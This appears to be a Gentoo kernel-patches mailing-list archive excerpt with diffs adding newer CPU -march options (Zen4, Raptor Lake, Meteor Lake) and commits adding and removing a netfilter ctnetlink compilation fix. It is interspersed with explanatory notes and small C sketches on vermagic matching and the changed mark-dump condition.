-+	default "6" if MK7 || MK8 || MPENTIUMM || MCORE2 || MATOM || MVIAC7 || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 || GENERIC_CPU3 || GENERIC_CPU4
++	default "6" if MK7 || MK8 || MPENTIUMM || MCORE2 || MATOM || MVIAC7 || MK8SSE3 || MK10 \
++	|| MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER \
++	|| MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT \
++	|| MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL \
++	|| MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
++	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE \
++	|| MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 || GENERIC_CPU3 \
++	|| GENERIC_CPU4
  	default "4" if MELAN || M486SX || M486 || MGEODEGX1
- 	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
- 
-@@ -336,11 +644,11 @@ config X86_ALIGNMENT_16
- 
+-	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
++	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII \
++	|| MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
+
+ config X86_F00F_BUG
+ 	def_bool y
+@@ -332,15 +676,27 @@ config X86_INVD_BUG
+
+ config X86_ALIGNMENT_16
+ 	def_bool y
+-	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC || M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
++	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC \
++	|| M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
+
  config X86_INTEL_USERCOPY
  	def_bool y
 -	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK7 || MEFFICEON || MCORE2
-+	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK7 || MEFFICEON || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL
- 
++	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC \
++	|| MK8 || MK7 || MEFFICEON || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
++	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
++	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL
+
  config X86_USE_PPRO_CHECKSUM
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MATOM
-+	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MATOM || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD
- 
++	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM \
++	|| MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX \
++	|| MCORE2 || MATOM || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER \
++	|| MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM \
++	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE \
++	|| MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE \
++	|| MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
+
  #
  # P6_NOPs are a relatively minor optimization that require a family >=
-@@ -356,26 +664,26 @@ config X86_USE_PPRO_CHECKSUM
+@@ -356,32 +712,62 @@ config X86_USE_PPRO_CHECKSUM
  config X86_P6_NOP
  	def_bool y
  	depends on X86_64
 -	depends on (MCORE2 || MPENTIUM4 || MPSC)
-+	depends on (MCORE2 || MPENTIUM4 || MPSC || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL)
- 
++	depends on (MCORE2 || MPENTIUM4 || MPSC || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
++	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE \
++	|| MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE \
++	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL)
+
  config X86_TSC
  	def_bool y
 -	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MATOM) || X86_64
-+	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MATOM || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD) || X86_64
- 
++	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM \
++	|| MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 \
++	|| MGEODE_LX || MCORE2 || MATOM || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER \
++	|| MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM \
++	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL \
++	|| MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
++	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL \
++	|| MNATIVE_AMD) || X86_64
+
  config X86_CMPXCHG64
  	def_bool y
 -	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8
-+	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8 || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD
- 
++	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 \
++	|| M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8 || MK8SSE3 || MK10 \
++	|| MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN \
++	|| MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS \
++	|| MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE \
++	|| MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
+
  # this should be set for all -march=.. options where the compiler
  # generates cmov.
  config X86_CMOV
  	def_bool y
 -	depends on (MK8 || MK7 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MATOM || MGEODE_LX)
-+	depends on (MK8 || MK7 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MATOM || MGEODE_LX || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD)
- 
++	depends on (MK8 || MK7 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 \
++	|| MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MATOM || MGEODE_LX || MK8SSE3 || MK10 \
++	|| MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR \
++	|| MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
++	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
++	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD)
+
  config X86_MINIMUM_CPU_FAMILY
  	int
  	default "64" if X86_64
 -	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8)
-+	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8 ||  MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD)
++	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 \
++	|| MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8 || MK8SSE3 \
++	|| MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER \
++	|| MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT \
++	|| MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL \
++	|| MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
++	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE \
++	|| MNATIVE_INTEL || MNATIVE_AMD)
  	default "5" if X86_32 && X86_CMPXCHG64
  	default "4"
- 
+
+ config X86_DEBUGCTLMSR
+ 	def_bool y
+-	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 || M486SX || M486) && !UML
++	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 \
++	|| M486SX || M486) && !UML
+
+ config IA32_FEAT_CTL
+ 	def_bool y
 diff --git a/arch/x86/Makefile b/arch/x86/Makefile
-index e84cdd409b64..7d3bbf060079 100644
+index bafbd905e6e7..7fae52788560 100644
 --- a/arch/x86/Makefile
 +++ b/arch/x86/Makefile
-@@ -131,8 +131,44 @@ else
+@@ -150,8 +150,47 @@ else
          # FIXME - should be integrated in Makefile.cpu (Makefile_32.cpu)
          cflags-$(CONFIG_MK8)		+= -march=k8
          cflags-$(CONFIG_MPSC)		+= -march=nocona
@@ -557,6 +650,7 @@ index e84cdd409b64..7d3bbf060079 100644
 +        cflags-$(CONFIG_MZEN) 		+= -march=znver1
 +        cflags-$(CONFIG_MZEN2) 	+= -march=znver2
 +        cflags-$(CONFIG_MZEN3) 	+= -march=znver3
++        cflags-$(CONFIG_MZEN4) 	+= -march=znver4
 +        cflags-$(CONFIG_MNATIVE_INTEL) += -march=native
 +        cflags-$(CONFIG_MNATIVE_AMD) 	+= -march=native
 +        cflags-$(CONFIG_MATOM) 	+= -march=bonnell
@@ -580,17 +674,19 @@ index e84cdd409b64..7d3bbf060079 100644
 +        cflags-$(CONFIG_MSAPPHIRERAPIDS) += -march=sapphirerapids
 +        cflags-$(CONFIG_MROCKETLAKE) 	+= -march=rocketlake
 +        cflags-$(CONFIG_MALDERLAKE) 	+= -march=alderlake
++        cflags-$(CONFIG_MRAPTORLAKE) 	+= -march=raptorlake
++        cflags-$(CONFIG_MMETEORLAKE) 	+= -march=meteorlake
 +        cflags-$(CONFIG_GENERIC_CPU2) 	+= -march=x86-64-v2
 +        cflags-$(CONFIG_GENERIC_CPU3) 	+= -march=x86-64-v3
 +        cflags-$(CONFIG_GENERIC_CPU4) 	+= -march=x86-64-v4
          cflags-$(CONFIG_GENERIC_CPU)	+= -mtune=generic
          KBUILD_CFLAGS += $(cflags-y)
- 
+
 diff --git a/arch/x86/include/asm/vermagic.h b/arch/x86/include/asm/vermagic.h
-index 75884d2cdec3..4e6a08d4c7e5 100644
+index 75884d2cdec3..18021e8c0c28 100644
 --- a/arch/x86/include/asm/vermagic.h
 +++ b/arch/x86/include/asm/vermagic.h
-@@ -17,6 +17,48 @@
+@@ -17,6 +17,52 @@
  #define MODULE_PROC_FAMILY "586MMX "
  #elif defined CONFIG_MCORE2
  #define MODULE_PROC_FAMILY "CORE2 "
@@ -636,10 +732,14 @@ index 75884d2cdec3..4e6a08d4c7e5 100644
 +#define MODULE_PROC_FAMILY "ROCKETLAKE "
 +#elif defined CONFIG_MALDERLAKE
 +#define MODULE_PROC_FAMILY "ALDERLAKE "
++#elif defined CONFIG_MRAPTORLAKE
++#define MODULE_PROC_FAMILY "RAPTORLAKE "
++#elif defined CONFIG_MMETEORLAKE
++#define MODULE_PROC_FAMILY "METEORLAKE "
  #elif defined CONFIG_MATOM
  #define MODULE_PROC_FAMILY "ATOM "
  #elif defined CONFIG_M686
-@@ -35,6 +77,30 @@
+@@ -35,6 +81,32 @@
  #define MODULE_PROC_FAMILY "K7 "
  #elif defined CONFIG_MK8
  #define MODULE_PROC_FAMILY "K8 "
@@ -667,9 +767,10 @@ index 75884d2cdec3..4e6a08d4c7e5 100644
 +#define MODULE_PROC_FAMILY "ZEN2 "
 +#elif defined CONFIG_MZEN3
 +#define MODULE_PROC_FAMILY "ZEN3 "
++#elif defined CONFIG_MZEN4
++#define MODULE_PROC_FAMILY "ZEN4 "
  #elif defined CONFIG_MELAN
  #define MODULE_PROC_FAMILY "ELAN "
  #elif defined CONFIG_MCRUSOE
--- 
-2.35.1
-
+--
+2.38.1
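
A note on two mechanisms the patch above touches. The X86_L1_CACHE_SHIFT
defaults are the log2 of the cache line size, so "6" selects 1 << 6 = 64-byte
lines for all of the added families, while "7" keeps 128 bytes for
Pentium 4/MPSC. The vermagic.h hunk matters at module load time:
MODULE_PROC_FAMILY is folded into the module version magic, so a module
built for one CPU family refuses to load on a kernel built for another.
A minimal sketch of that check, with simplified names and string layout
(the real composition lives in include/linux/vermagic.h and also folds in
SMP/preempt/mod_unload state):

#include <stdio.h>
#include <string.h>

#define UTS_RELEASE "6.1.65"            /* example release string */
#define MODULE_PROC_FAMILY "ZEN4 "      /* set by the Kconfig choice */

/* Simplified: the kernel builds this from several MODULE_VERMAGIC_* parts. */
#define VERMAGIC_STRING UTS_RELEASE " SMP preempt mod_unload " MODULE_PROC_FAMILY

/* modprobe-style check: a module loads only if its magic matches exactly. */
static int vermagic_ok(const char *module_magic)
{
	return strcmp(module_magic, VERMAGIC_STRING) == 0;
}

int main(void)
{
	printf("kernel vermagic: \"%s\"\n", VERMAGIC_STRING);
	printf("K8-built module accepted: %s\n",
	       vermagic_ok("6.1.65 SMP preempt mod_unload K8 ") ? "yes" : "no");
	return 0;
}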


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-11 23:32 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2022-12-11 23:32 UTC (permalink / raw
  To: gentoo-commits

commit:     b3e9a3f6269e7e72eb6a51ca19dc85e2201fb843
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Dec 11 23:32:12 2022 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Dec 11 23:32:12 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=b3e9a3f6

Remove redundant patch

Removed:
2010_netfilter-ctnetlink-compilation-fix.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                    |  4 --
 2010_netfilter-ctnetlink-compilation-fix.patch | 90 --------------------------
 2 files changed, 94 deletions(-)

diff --git a/0000_README b/0000_README
index 528708c1..5e68531e 100644
--- a/0000_README
+++ b/0000_README
@@ -59,10 +59,6 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
-Patch:  2010_netfilter-ctnetlink-compilation-fix.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git
-Desc:   netfilter: ctnetlink: fix compilation warning after data race fixes in ct mark
-
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requires REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2010_netfilter-ctnetlink-compilation-fix.patch b/2010_netfilter-ctnetlink-compilation-fix.patch
deleted file mode 100644
index b7bd4dee..00000000
--- a/2010_netfilter-ctnetlink-compilation-fix.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From 1feeae071507ad65cf9f462a1bdd543a4bf89e71 Mon Sep 17 00:00:00 2001
-From: Pablo Neira Ayuso <pablo@netfilter.org>
-Date: Mon, 28 Nov 2022 10:58:53 +0100
-Subject: netfilter: ctnetlink: fix compilation warning after data race fixes
- in ct mark
-
-All warnings (new ones prefixed by >>):
-
-   net/netfilter/nf_conntrack_netlink.c: In function '__ctnetlink_glue_build':
->> net/netfilter/nf_conntrack_netlink.c:2674:13: warning: unused variable 'mark' [-Wunused-variable]
-    2674 |         u32 mark;
-         |             ^~~~
-
-Fixes: 52d1aa8b8249 ("netfilter: conntrack: Fix data-races around ct mark")
-Reported-by: kernel test robot <lkp@intel.com>
-Tested-by: Ivan Babrou <ivan@ivan.computer>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- net/netfilter/nf_conntrack_netlink.c | 19 ++++++++++---------
- 1 file changed, 10 insertions(+), 9 deletions(-)
-
-diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
-index d71150a40fb08..1286ae7d46096 100644
---- a/net/netfilter/nf_conntrack_netlink.c
-+++ b/net/netfilter/nf_conntrack_netlink.c
-@@ -328,8 +328,13 @@ nla_put_failure:
- }
- 
- #ifdef CONFIG_NF_CONNTRACK_MARK
--static int ctnetlink_dump_mark(struct sk_buff *skb, u32 mark)
-+static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct)
- {
-+	u32 mark = READ_ONCE(ct->mark);
-+
-+	if (!mark)
-+		return 0;
-+
- 	if (nla_put_be32(skb, CTA_MARK, htonl(mark)))
- 		goto nla_put_failure;
- 	return 0;
-@@ -543,7 +548,7 @@ static int ctnetlink_dump_extinfo(struct sk_buff *skb,
- static int ctnetlink_dump_info(struct sk_buff *skb, struct nf_conn *ct)
- {
- 	if (ctnetlink_dump_status(skb, ct) < 0 ||
--	    ctnetlink_dump_mark(skb, READ_ONCE(ct->mark)) < 0 ||
-+	    ctnetlink_dump_mark(skb, ct) < 0 ||
- 	    ctnetlink_dump_secctx(skb, ct) < 0 ||
- 	    ctnetlink_dump_id(skb, ct) < 0 ||
- 	    ctnetlink_dump_use(skb, ct) < 0 ||
-@@ -722,7 +727,6 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
- 	struct sk_buff *skb;
- 	unsigned int type;
- 	unsigned int flags = 0, group;
--	u32 mark;
- 	int err;
- 
- 	if (events & (1 << IPCT_DESTROY)) {
-@@ -827,9 +831,8 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
- 	}
- 
- #ifdef CONFIG_NF_CONNTRACK_MARK
--	mark = READ_ONCE(ct->mark);
--	if ((events & (1 << IPCT_MARK) || mark) &&
--	    ctnetlink_dump_mark(skb, mark) < 0)
-+	if (events & (1 << IPCT_MARK) &&
-+	    ctnetlink_dump_mark(skb, ct) < 0)
- 		goto nla_put_failure;
- #endif
- 	nlmsg_end(skb, nlh);
-@@ -2671,7 +2674,6 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
- {
- 	const struct nf_conntrack_zone *zone;
- 	struct nlattr *nest_parms;
--	u32 mark;
- 
- 	zone = nf_ct_zone(ct);
- 
-@@ -2733,8 +2735,7 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
- 		goto nla_put_failure;
- 
- #ifdef CONFIG_NF_CONNTRACK_MARK
--	mark = READ_ONCE(ct->mark);
--	if (mark && ctnetlink_dump_mark(skb, mark) < 0)
-+	if (ctnetlink_dump_mark(skb, ct) < 0)
- 		goto nla_put_failure;
- #endif
- 	if (ctnetlink_dump_labels(skb, ct) < 0)
--- 
-cgit 
-
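
One subtlety in the ctnetlink hunks quoted above: the event-path condition
changes from "(events & (1 << IPCT_MARK)) || mark" to just
"events & (1 << IPCT_MARK)", with the mark == 0 check folded into the
helper. So after the change a nonzero mark is dumped only when the
IPCT_MARK event bit is set, and a zero mark is never dumped. A standalone
sketch enumerating both predicates (assumed values, not kernel code):

#include <stdio.h>

#define IPCT_MARK_BIT 1u

int main(void)
{
	unsigned int events, mark;

	puts("event-bit  mark  old-dumps  new-dumps");
	for (events = 0; events <= 1; events++) {
		for (mark = 0; mark <= 1; mark++) {
			/* old: attempt the dump when the event bit is set OR
			 * mark is nonzero; the old helper wrote CTA_MARK
			 * unconditionally. */
			int old_dumps = (events & IPCT_MARK_BIT) || mark;
			/* new: attempt the dump only on the event bit; the
			 * helper now returns early when mark == 0. */
			int new_dumps = (events & IPCT_MARK_BIT) && mark;

			printf("%9u  %4u  %9s  %9s\n", events, mark,
			       old_dumps ? "yes" : "no",
			       new_dumps ? "yes" : "no");
		}
	}
	return 0;
}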


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-11 14:28 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2022-12-11 14:28 UTC (permalink / raw
  To: gentoo-commits

commit:     2009fbd52bfcd103d36a829e6d8f6ded19de3fdf
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Dec 11 14:28:34 2022 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Dec 11 14:28:34 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2009fbd5

netfilter: ctnetlink: fix compilation warning after data race fixes in ct mark

Bug: https://bugs.gentoo.org/884585

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                    |  4 ++
 2010_netfilter-ctnetlink-compilation-fix.patch | 90 ++++++++++++++++++++++++++
 2 files changed, 94 insertions(+)

diff --git a/0000_README b/0000_README
index 5e68531e..528708c1 100644
